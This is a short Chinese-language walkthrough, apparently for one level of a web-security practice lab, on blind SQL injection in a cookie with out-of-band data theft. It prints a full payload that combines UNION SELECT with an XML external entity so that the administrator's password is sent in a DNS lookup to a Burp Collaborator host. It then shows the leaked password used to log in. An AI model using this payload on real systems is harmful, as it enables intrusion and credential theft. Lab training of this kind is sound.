第十七关 带外数据外泄的盲 SQL 注入
这一关也是sq盲注和xxe外部实体注入结合用的,通过外带导致密码数据泄露
提示:1、存在sql盲注,注入点在cookie
2、利用sql注入漏洞导致对 Burp Collaborator 进行 DNS 查找
3、可以触发与外部域的带外交互
4、该数据库包含一个名为users的表,有username和password两个字段列
具体操作:
1、让burp Collaborator先生成一个子域名(具体操作见第十六关)
2、直接拦截数据包,插入SQL注入和xxe外部实体注入结合的语句
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.u2xdyvuwhezgrgjf3uew056vpmvgj77w.oastify.com/">+%25remote%3b]>'),'/l') FROM dual--
3、再去查看Burp的Collaborator界面看到有一次DNS或HTTP请求,证明外带成功,目标存在此类高危漏洞,而且暴露出了密码数据
暴露出:ehclin9vamr9glih36po.u2xdyvuwhezgrgjf3uew056vpmvgj77w.oastify.com
密码:ehclin9vamr9glih36po
4、用暴露出来的密码进行登录,靶场过关
